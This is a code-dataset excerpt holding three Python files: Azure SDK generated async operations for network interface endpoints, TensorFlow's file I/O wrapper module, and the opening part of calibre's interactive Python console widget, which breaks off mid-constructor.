repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_10_01/aio/operations/_interface_endpoints_operations.py | 1 | 23817 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations:
"""InterfaceEndpointsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_10_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def get(
self,
resource_group_name: str,
interface_endpoint_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.InterfaceEndpoint":
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "_models.InterfaceEndpoint",
**kwargs
) -> "_models.InterfaceEndpoint":
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "_models.InterfaceEndpoint",
**kwargs
) -> AsyncLROPoller["_models.InterfaceEndpoint"]:
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["_models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
| mit | -8,307,013,246,436,605,000 | 48.930818 | 205 | 0.647941 | false |
yaroslavvb/tensorflow | tensorflow/python/lib/io/file_io.py | 23 | 14674 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""File IO methods that wrap the C++ FileSystem API.
The C++ FileSystem API is SWIG wrapped in file_io.i. These functions call those
to accomplish basic File IO operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import uuid
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.framework import errors
from tensorflow.python.util import compat
class FileIO(object):
"""FileIO class that exposes methods to read / write to / from files.
The constructor takes the following arguments:
name: name of the file
mode: one of 'r', 'w', 'a', 'r+', 'w+', 'a+'. Append 'b' for bytes mode.
Can be used as an iterator to iterate over lines in the file.
The default buffer size used for the BufferedInputStream used for reading
the file line by line is 1024 * 512 bytes.
"""
def __init__(self, name, mode):
self.__name = name
self.__mode = mode
self._read_buf = None
self._writable_file = None
self._binary_mode = "b" in mode
mode = mode.replace("b", "")
if mode not in ("r", "w", "a", "r+", "w+", "a+"):
raise errors.InvalidArgumentError(
None, None, "mode is not 'r' or 'w' or 'a' or 'r+' or 'w+' or 'a+'")
self._read_check_passed = mode in ("r", "r+", "a+", "w+")
self._write_check_passed = mode in ("a", "w", "r+", "a+", "w+")
@property
def name(self):
"""Returns the file name."""
return self.__name
@property
def mode(self):
"""Returns the mode in which the file was opened."""
return self.__mode
def _preread_check(self):
if not self._read_buf:
if not self._read_check_passed:
raise errors.PermissionDeniedError(None, None,
"File isn't open for reading")
with errors.raise_exception_on_not_ok_status() as status:
self._read_buf = pywrap_tensorflow.CreateBufferedInputStream(
compat.as_bytes(self.__name), 1024 * 512, status)
def _prewrite_check(self):
if not self._writable_file:
if not self._write_check_passed:
raise errors.PermissionDeniedError(None, None,
"File isn't open for writing")
with errors.raise_exception_on_not_ok_status() as status:
self._writable_file = pywrap_tensorflow.CreateWritableFile(
compat.as_bytes(self.__name), compat.as_bytes(self.__mode), status)
def _prepare_value(self, val):
if self._binary_mode:
return compat.as_bytes(val)
else:
return compat.as_str_any(val)
def size(self):
"""Returns the size of the file."""
return stat(self.__name).length
def write(self, file_content):
"""Writes file_content to the file. Appends to the end of the file."""
self._prewrite_check()
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.AppendToFile(
compat.as_bytes(file_content), self._writable_file, status)
def read(self, n=-1):
"""Returns the contents of a file as a string.
Starts reading from current position in file.
Args:
n: Read 'n' bytes if n != -1. If n = -1, reads to end of file.
Returns:
'n' bytes of the file (or whole file) in bytes mode or 'n' bytes of the
string if in string (regular) mode.
"""
self._preread_check()
with errors.raise_exception_on_not_ok_status() as status:
if n == -1:
length = self.size() - self.tell()
else:
length = n
return self._prepare_value(
pywrap_tensorflow.ReadFromStream(self._read_buf, length, status))
def seek(self, position):
"""Seeks to the position in the file."""
self._preread_check()
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._read_buf.Seek(position)
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
def readline(self):
r"""Reads the next line from the file. Leaves the '\n' at the end."""
self._preread_check()
return self._prepare_value(self._read_buf.ReadLineAsString())
def readlines(self):
"""Returns all lines from the file in a list."""
self._preread_check()
lines = []
while True:
s = self.readline()
if not s:
break
lines.append(s)
return lines
def tell(self):
"""Returns the current position in the file."""
self._preread_check()
return self._read_buf.Tell()
def __enter__(self):
"""Make usable with "with" statement."""
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
"""Make usable with "with" statement."""
self.close()
def __iter__(self):
return self
def next(self):
retval = self.readline()
if not retval:
raise StopIteration()
return retval
def __next__(self):
return self.next()
def flush(self):
"""Flushes the Writable file.
This only ensures that the data has made its way out of the process without
any guarantees on whether it's written to disk. This means that the
data would survive an application crash but not necessarily an OS crash.
"""
if self._writable_file:
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._writable_file.Flush()
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
def close(self):
"""Closes FileIO. Should be called for the WritableFile to be flushed."""
self._read_buf = None
if self._writable_file:
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._writable_file.Close()
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
self._writable_file = None
def file_exists(filename):
"""Determines whether a path exists or not.
Args:
filename: string, a path
Returns:
True if the path exists, whether its a file or a directory.
False if the path does not exist and there are no filesystem errors.
Raises:
errors.OpError: Propagates any errors reported by the FileSystem API.
"""
try:
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.FileExists(compat.as_bytes(filename), status)
except errors.NotFoundError:
return False
return True
def delete_file(filename):
"""Deletes the file located at 'filename'.
Args:
filename: string, a filename
Raises:
errors.OpError: Propagates any errors reported by the FileSystem API. E.g.,
NotFoundError if the file does not exist.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.DeleteFile(compat.as_bytes(filename), status)
def read_file_to_string(filename, binary_mode=False):
"""Reads the entire contents of a file to a string.
Args:
filename: string, path to a file
binary_mode: whether to open the file in binary mode or not. This changes
the type of the object returned.
Returns:
contents of the file as a string or bytes.
Raises:
errors.OpError: Raises variety of errors that are subtypes e.g.
NotFoundError etc.
"""
if binary_mode:
f = FileIO(filename, mode="rb")
else:
f = FileIO(filename, mode="r")
return f.read()
def write_string_to_file(filename, file_content):
"""Writes a string to a given file.
Args:
filename: string, path to a file
file_content: string, contents that need to be written to the file
Raises:
errors.OpError: If there are errors during the operation.
"""
with FileIO(filename, mode="w") as f:
f.write(file_content)
def get_matching_files(filename):
"""Returns a list of files that match the given pattern.
Args:
filename: string, the pattern
Returns:
Returns a list of strings containing filenames that match the given pattern.
Raises:
errors.OpError: If there are filesystem / directory listing errors.
"""
with errors.raise_exception_on_not_ok_status() as status:
# Convert each element to string, since the return values of the
# vector of string should be interpreted as strings, not bytes.
return [compat.as_str_any(matching_filename)
for matching_filename in pywrap_tensorflow.GetMatchingFiles(
compat.as_bytes(filename), status)]
def create_dir(dirname):
"""Creates a directory with the name 'dirname'.
Args:
dirname: string, name of the directory to be created
Notes:
The parent directories need to exist. Use recursive_create_dir instead if
there is the possibility that the parent dirs don't exist.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.CreateDir(compat.as_bytes(dirname), status)
def recursive_create_dir(dirname):
"""Creates a directory and all parent/intermediate directories.
It succeeds if dirname already exists and is writable.
Args:
dirname: string, name of the directory to be created
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.RecursivelyCreateDir(compat.as_bytes(dirname), status)
def copy(oldpath, newpath, overwrite=False):
"""Copies data from oldpath to newpath.
Args:
oldpath: string, name of the file who's contents need to be copied
newpath: string, name of the file to which to copy to
overwrite: boolean, if false its an error for newpath to be occupied by an
existing file.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.CopyFile(
compat.as_bytes(oldpath), compat.as_bytes(newpath), overwrite, status)
def rename(oldname, newname, overwrite=False):
"""Rename or move a file / directory.
Args:
oldname: string, pathname for a file
newname: string, pathname to which the file needs to be moved
overwrite: boolean, if false its an error for newpath to be occupied by an
existing file.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.RenameFile(
compat.as_bytes(oldname), compat.as_bytes(newname), overwrite, status)
def atomic_write_string_to_file(filename, contents):
"""Writes to `filename` atomically.
This means that when `filename` appears in the filesystem, it will contain
all of `contents`. With write_string_to_file, it is possible for the file
to appear in the filesystem with `contents` only partially written.
Accomplished by writing to a temp file and then renaming it.
Args:
filename: string, pathname for a file
contents: string, contents that need to be written to the file
"""
temp_pathname = filename + ".tmp" + uuid.uuid4().hex
write_string_to_file(temp_pathname, contents)
rename(temp_pathname, filename, overwrite=True)
def delete_recursively(dirname):
"""Deletes everything under dirname recursively.
Args:
dirname: string, a path to a directory
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.DeleteRecursively(compat.as_bytes(dirname), status)
def is_directory(dirname):
"""Returns whether the path is a directory or not.
Args:
dirname: string, path to a potential directory
Returns:
True, if the path is a directory; False otherwise
"""
try:
status = pywrap_tensorflow.TF_NewStatus()
return pywrap_tensorflow.IsDirectory(compat.as_bytes(dirname), status)
finally:
pywrap_tensorflow.TF_DeleteStatus(status)
def list_directory(dirname):
"""Returns a list of entries contained within a directory.
The list is in arbitrary order. It does not contain the special entries "."
and "..".
Args:
dirname: string, path to a directory
Returns:
[filename1, filename2, ... filenameN] as strings
Raises:
errors.NotFoundError if directory doesn't exist
"""
if not is_directory(dirname):
raise errors.NotFoundError(None, None, "Could not find directory")
with errors.raise_exception_on_not_ok_status() as status:
# Convert each element to string, since the return values of the
# vector of string should be interpreted as strings, not bytes.
return [
compat.as_str_any(filename)
for filename in pywrap_tensorflow.GetChildren(
compat.as_bytes(dirname), status)
]
def walk(top, in_order=True):
"""Recursive directory tree generator for directories.
Args:
top: string, a Directory name
in_order: bool, Traverse in order if True, post order if False.
Errors that happen while listing directories are ignored.
Yields:
Each yield is a 3-tuple: the pathname of a directory, followed by lists of
all its subdirectories and leaf files.
(dirname, [subdirname, subdirname, ...], [filename, filename, ...])
as strings
"""
top = compat.as_str_any(top)
try:
listing = list_directory(top)
except errors.NotFoundError:
return
files = []
subdirs = []
for item in listing:
full_path = os.path.join(top, item)
if is_directory(full_path):
subdirs.append(item)
else:
files.append(item)
here = (top, subdirs, files)
if in_order:
yield here
for subdir in subdirs:
for subitem in walk(os.path.join(top, subdir), in_order):
yield subitem
if not in_order:
yield here
def stat(filename):
"""Returns file statistics for a given path.
Args:
filename: string, path to a file
Returns:
FileStatistics struct that contains information about the path
Raises:
errors.OpError: If the operation fails.
"""
file_statistics = pywrap_tensorflow.FileStatistics()
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.Stat(compat.as_bytes(filename), file_statistics, status)
return file_statistics
| apache-2.0 | 449,743,245,204,139,200 | 29.380952 | 80 | 0.676775 | false |
kobolabs/calibre | src/calibre/utils/pyconsole/console.py | 9 | 16915 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
__license__ = 'GPL v3'
__copyright__ = '2010, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import sys, textwrap, traceback, StringIO
from functools import partial
from codeop import CommandCompiler
from PyQt4.Qt import QTextEdit, Qt, QTextFrameFormat, pyqtSignal, \
QApplication, QColor, QPalette, QMenu, QActionGroup, QTimer
from pygments.lexers import PythonLexer, PythonTracebackLexer
from pygments.styles import get_all_styles
from calibre.utils.pyconsole.formatter import Formatter
from calibre.utils.pyconsole.controller import Controller
from calibre.utils.pyconsole.history import History
from calibre.utils.pyconsole import prints, prefs, __appname__, \
__version__, error_dialog, dynamic
class EditBlock(object): # {{{
def __init__(self, cursor):
self.cursor = cursor
def __enter__(self):
self.cursor.beginEditBlock()
return self.cursor
def __exit__(self, *args):
self.cursor.endEditBlock()
# }}}
class Prepender(object): # {{{
'Helper class to insert output before the current prompt'
def __init__(self, console):
self.console = console
def __enter__(self):
c = self.console
self.opos = c.cursor_pos
cur = c.prompt_frame.firstCursorPosition()
cur.movePosition(cur.PreviousCharacter)
c.setTextCursor(cur)
def __exit__(self, *args):
self.console.cursor_pos = self.opos
# }}}
class ThemeMenu(QMenu): # {{{
def __init__(self, parent):
QMenu.__init__(self, _('Choose theme (needs restart)'))
parent.addMenu(self)
self.group = QActionGroup(self)
current = prefs['theme']
alls = list(sorted(get_all_styles()))
if current not in alls:
current = prefs['theme'] = 'default'
self.actions = []
for style in alls:
ac = self.group.addAction(style)
ac.setCheckable(True)
if current == style:
ac.setChecked(True)
self.actions.append(ac)
ac.triggered.connect(partial(self.set_theme, style))
self.addAction(ac)
def set_theme(self, style, *args):
prefs['theme'] = style
# }}}
class Console(QTextEdit):
running = pyqtSignal()
running_done = pyqtSignal()
@property
def doc(self):
return self.document()
@property
def cursor(self):
return self.textCursor()
@property
def root_frame(self):
return self.doc.rootFrame()
def unhandled_exception(self, type, value, tb):
if type == KeyboardInterrupt:
return
try:
sio = StringIO.StringIO()
traceback.print_exception(type, value, tb, file=sio)
fe = sio.getvalue()
prints(fe)
try:
val = unicode(value)
except:
val = repr(value)
msg = '<b>%s</b>:'%type.__name__ + val
error_dialog(self, _('ERROR: Unhandled exception'), msg,
det_msg=fe, show=True)
except BaseException:
pass
def __init__(self,
prompt='>>> ',
continuation='... ',
parent=None):
QTextEdit.__init__(self, parent)
self.shutting_down = False
self.compiler = CommandCompiler()
self.buf = self.old_buf = []
